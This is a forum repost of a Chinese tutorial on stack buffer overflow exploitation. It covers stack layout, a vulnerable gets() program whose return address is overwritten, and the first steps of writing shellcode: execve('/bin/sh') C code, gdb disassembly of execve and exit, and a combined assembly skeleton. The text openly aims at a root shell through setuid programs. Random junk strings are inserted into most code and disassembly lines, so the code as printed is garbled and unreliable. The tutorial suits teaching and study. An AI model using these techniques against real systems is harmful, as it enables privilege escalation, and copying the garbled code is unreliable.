EDA365欢迎您登录!
您需要 登录 才可以下载或查看,没有帐号?注册
x
堆栈溢出技术从入门到精通
2 d) i4 d1 w- e1 J3 @
3 b0 S0 q: h5 m& e- i虽然溢出在程序开发过程中不可完全避免,但溢出对系统的威胁是巨大的,由于系统的特殊性,溢出发生时攻击者可以利用其漏洞来获取系统的高级权限root,因此本文将详细介绍堆栈溢出技术…… 在您开始了解堆栈溢出前,首先你应该了解win32汇编语言,熟悉寄存器的组成和功能。你必须有堆栈和存储分配方面的基础知识,有关这方面的计算机书籍很多,我将只是简单阐述原理,着重在应用。其次,你应该了解linux,本讲中我们的例子将在linux上开发。 1、首先复习一下基础知识。 从物理上讲,堆栈是就是一段连续分配的内存空间。在一个程序中,会声明各种变量。静态全局变量是位于数据段并且在程序开始运行的时候被加载。而程序的动态的局部变量则分配在堆栈里面。 从操作上来讲,堆栈是一个先入后出的队列。他的生长方向与内存的生长方向正好相反。我们规定内存的生长方向为向上,则栈的生长方向为向下。压栈的操作push=ESP-4,出栈的操作是pop=ESP+4.换句话说,堆栈中老的值,其内存地址,反而比新的值要大。请牢牢记住这一点,因为这是堆栈溢出的基本理论依据。 在一次函数调用中,堆栈中将被依次压入:参数,返回地址,EBP。如果函数有局部变量,接下来,就在堆栈中开辟相应的空间以构造变量。函数执行结束,这些局部变量的内容将被丢失。但是不被清除。在函数返回的时候,弹出EBP,恢复堆栈到函数调用的地址,弹出返回地址到EIP以继续执行程序。 在C语言程序中,参数的压栈顺序是反向的。比如func(a,b,c)。在参数入栈的时候,是:先压c,再压b,最后a。在取参数的时候,由于栈的先入后出,先取栈顶的a,再取b,最后取c。这些是汇编语言的基础知识,用户在开始前必须要了解这些知识。 2、现在我们来看一看什么是堆栈溢出。 运行时的堆栈分配 堆栈溢出就是不顾堆栈中数据块大小,向该数据块写入了过多的数据,导致数据越界,结果覆盖了老的堆栈数据。 例如程序一: #include 1 T/ d3 Y s; a( C' [ G/ Z
int main ( ) # B' i6 x a% C# A7 ]( V0 i
{
& `- b k- D1 M. {+ ^char name[8]; & Z1 ?* w) p4 d2 u; U, G
printf("Please type your name: ");
: y9 g) Y. w# H5 I- r) Q# pgets(name); 1 V1 _% o6 r7 @/ U4 B G1 I. q6 u
printf("Hello, %s!", name); 2 ^7 T' Y% \0 H2 N d
return 0;
8 F) ?8 m! V( W} |
编译并且执行,我们输入ipxodi,就会输出Hello,ipxodi!。程序运行中,堆栈是怎么操作的呢? 在main函数开始运行的时候,堆栈里面将被依次放入返回地址,EBP。 我们用gcc -S 来获得汇编语言输出,可以看到main函数的开头部分对应如下语句: pushl %ebp
& H. _3 _% [0 v8 M( Amovl %esp,%ebp 4 O2 }2 R& S& V
subl $8,%esp |
首先他把EBP保存下来,,然后EBP等于现在的ESP,这样EBP就可以用来访问本函数的局部变量。之后ESP减8,就是堆栈向上增长8个字节,用来存放name[]数组。最后,main返回,弹出ret里的地址,赋值给EIP,CPU继续执行EIP所指向的指令。 堆栈溢出 现在我们再执行一次,输入ipxodiAAAAAAAAAAAAAAA,执行完gets(name)之后,由于我们输入的name字符串太长,name数组容纳不下,只好向内存顶部继续写‘A’。由于堆栈的生长方向与内存的生长方向相反,这些‘A’覆盖了堆栈的老的元素。 我们可以发现,EBP,ret都已经被‘A’覆盖了。在main返回的时候,就会把‘AAAA’的ASCII码:0x41414141作为返回地址,CPU会试图执行0x41414141处的指令,结果出现错误。这就是一次堆栈溢出。 3、如何利用堆栈溢出 我们已经制造了一次堆栈溢出。其原理可以概括为:由于字符串处理函数(gets,strcpy等等)没有对数组越界加以监视和限制,我们利用字符数组写越界,覆盖堆栈中的老元素的值,就可以修改返回地址。 在上面的例子中,这导致CPU去访问一个不存在的指令,结果出错。事实上,当堆栈溢出的时候,我们已经完全的控制了这个程序下一步的动作。如果我们用一个实际存在指令地址来覆盖这个返回地址,CPU就会转而执行我们的指令。 在UINX/linux系统中,我们的指令可以执行一个shell,这个shell将获得和被我们堆栈溢出的程序相同的权限。如果这个程序是setuid的,那么我们就可以获得root shell。下一讲将叙述如何书写一个shell code。 如何书写一个shell code 一:shellcode基本算法分析 在程序中,执行一个shell的程序是这样写的: shellcode.c * H; J4 a$ f0 |9 V: z) g8 q
------------------------------------------------------------------------
9 m* M9 i9 P+ O0 p3 d8 J3 j#include 5 H7 n) ?: s; `
void main() { 0 u2 i$ i3 D+ j% g* i' h' G
char *name[2];
* h% @8 A. [, v5 f: A- E: Mname[0] = "/bin/sh"
V U& ?$ Q$ f- Bname[1] = NULL; 9 P Z. m4 t- ]8 }: y
execve(name[0], name, NULL); 1 }6 S5 s4 J$ V m3 D
} # t7 D, T' [' z
------------------------------------------------------------------------ |
execve函数将执行一个程序。他需要程序的名字地址作为第一个参数。一个内容为该程序的argv(argv[n-1]=0)的指针数组作为第二个参数,以及(char*) 0作为第三个参数。 我们来看以看execve的汇编代码: [nkl10]$Content$nbsp;gcc -o shellcode -static shellcode.c 0 }/ P O! g5 r, D5 z! d' D0 Y
[nkl10]$Content$nbsp;gdb shellcode
) }3 F) ^. d, M }(gdb) disassemble __execve * [) k% q" O& B3 b9 s
Dump of assembler code for function __execve: 8 V! T; E: T- ^
0x80002bc <__execve>: pushl %ebp ; + o3 Z W" a$ L7 H0 f& T0 q' Y
0x80002bd <__execve+1>: movl %esp,%ebp * L7 r: [/ ~1 v x; R' p# C) W& g5 c
;上面是函数头。 : z: d& U0 p1 U. g) f( | z# g1 v
0x80002bf <__execve+3>: pushl %ebx
/ t7 x% a. h: F4 [& N. y) B;保存ebx
8 ?4 ]9 C) y4 ]2 ?0x80002c0 <__execve+4>: movl $0xb,%eax
2 c% i+ b* B0 _: U- c;eax=0xb,eax指明第几号系统调用。
* F- u; A) ]8 F3 [9 v; b+ f! n9 v0x80002c5 <__execve+9>: movl 0x8(%ebp),%ebx
; V% Y$ M% G, l- b: `/ b a;ebp+8是第一个参数"/bin/sh\0"
) D4 |! ]8 H% @8 v* o; I0x80002c8 <__execve+12>: movl 0xc(%ebp),%ecx
# l# w/ L3 J1 i# D# V( g;ebp+12是第二个参数name数组的地址
% a; v$ v' r. ~0x80002cb <__execve+15>: movl 0x10(%ebp),%edx 7 |! m; M i7 B; \+ H0 c' k
;ebp+16是第三个参数空指针的地址。
( ]- I& n# Z! f2 E2 ^/ m% s;name[2-1]内容为NULL,用来存放返回值。 ' Q. c3 N5 q7 W8 N- A
0x80002ce <__execve+18>: int $0x80 % U7 f% c9 n4 q W: g3 u8 N, v
;执行0xb号系统调用(execve)
5 X8 A) [1 u) S) H1 S& t0x80002d0 <__execve+20>: movl %eax,%edx 5 t$ n! `' b6 P. o; }
;下面是返回值的处理就没有用了。
% G% H6 q& d+ o y' t( ?7 J1 K! N O0x80002d2 <__execve+22>: testl %edx,%edx ; ]6 j! ~, n& N
0x80002d4 <__execve+24>: jnl 0x80002e6 <__execve+42>
* ]4 b5 ~" _' _6 Y6 E# H0x80002d6 <__execve+26>: negl %edx
; D% F ?3 `8 o- D# w+ [0 Q0x80002d8 <__execve+28>: pushl %edx % u) `' ^9 A6 A/ Z o# s
0x80002d9 <__execve+29>: call 0x8001a34
: q8 _% O: u; Y( |! U" k! t<__normal_errno_location>
1 `; Q* {" Z/ x5 F& c0x80002de <__execve+34>: popl %edx 6 B' J0 s) W. ]# o! @9 n
0x80002df <__execve+35>: movl %edx,(%eax)
/ s8 I6 p$ ^# N, a/ A0x80002e1 <__execve+37>: movl $0xffffffff,%eax / F0 S" t1 D# ^) _4 ?
0x80002e6 <__execve+42>: popl %ebx
% S& n# t6 l% }) \0x80002e7 <__execve+43>: movl %ebp,%esp
$ t: E" x9 Y, c- P5 p0x80002e9 <__execve+45>: popl %ebp ! l: |5 {2 b$ G' Y2 Q4 X J
0x80002ea <__execve+46>: ret
8 y" F7 k8 i9 A4 D/ m S1 Z0x80002eb <__execve+47>: nop $ S' a/ r, w2 K9 F3 g. F
End of assembler dump. |
经过以上的分析,可以得到如下的精简指令算法: movl $execve的系统调用号,%eax
T( `' w+ ?( ~, A! A, r: Umovl "bin/sh\0"的地址,%ebx
3 H( m) k9 T: U# H+ B8 ~movl name数组的地址,%ecx
6 j! C* I0 ]5 o0 ]/ Q) amovl name[n-1]的地址,%edx 5 ^7 ^$ I' r; h" v# P5 K" ~
int $0x80 ;执行系统调用(execve) |
当execve执行成功后,程序shellcode就会退出,/bin/sh将作为子进程继续执行。可是,如果我们的execve执行失败,(比如没有/bin/sh这个文件),CPU就会继续执行后续的指令,结果不知道跑到哪里去了。所以必须再执行一个exit()系统调用,结束shellcode.c的执行。 我们来看以看exit(0)的汇编代码: (gdb) disassemble _exit ) v B! D5 _/ m7 `7 V
Dump of assembler code for function _exit:
- ]$ X, U: {# F4 \0x800034c <_exit>: pushl %ebp
5 k+ Y8 L/ L8 r+ W8 |0 m9 R0x800034d <_exit+1>: movl %esp,%ebp
$ f1 U# o8 k: T1 r. y0x800034f <_exit+3>: pushl %ebx J7 X T. Y7 p# {* s% t2 D. h
0x8000350 <_exit+4>: movl $0x1,%eax ;1号系统调用
; Q% |# ?* j0 ~! j0x8000355 <_exit+9>: movl 0x8(%ebp),%ebx ;ebx为参数0
a; X" I0 ?6 t0x8000358 <_exit+12>: int $0x80 ;引发系统调用
# n$ s$ ?4 f- `7 x, W5 C0x800035a <_exit+14>: movl 0xfffffffc(%ebp),%ebx 8 P( b# `$ U/ F& U7 q. U
0x800035d <_exit+17>: movl %ebp,%esp
# F5 [ D! P5 |' S) F0x800035f <_exit+19>: popl %ebp
3 w% |& {& [1 E, a0x8000360 <_exit+20>: ret & E5 H7 i! `. ^ ~
0x8000361 <_exit+21>: nop 9 s1 G) q2 R, v9 P! w8 M& ?
0x8000362 <_exit+22>: nop
, c- L8 \ {5 n8 X4 e: [0x8000363 <_exit+23>: nop * Q& C* h/ a( y
End of assembler dump. |
看来exit(0)〕的汇编代码更加简单: movl $0x1,%eax ;1号系统调用
4 g A3 N9 v$ }* v2 R+ f2 ?movl 0,%ebx ;ebx为exit的参数0
7 C1 T$ n0 @; _' j5 ?: iint $0x80 ;引发系统调用 |
那么总结一下,合成的汇编代码为: movl $execve的系统调用号,%eax
9 m3 b+ `- E7 i# Z( J Dmovl "bin/sh\0"的地址,%ebx . e, X: I4 ?# ]. \
movl name数组的地址,%ecx & B' s/ q% a9 l) G. x4 i4 u
movl name[n-1]的地址,%edx - b' x3 o8 P8 x
int $0x80 ;执行系统调用(execve)
! i9 }& q( B* imovl $0x1,%eax ;1号系统调用 9 s, q6 p: r$ X1 m$ @/ u" B
movl 0,%ebx ;ebx为exit的参数0 $ I* o$ L" T- x* @3 u5 z6 T' g1 K
int $0x80 ;执行系统调用(exit) | 8 w' N+ A q. _! W* f
|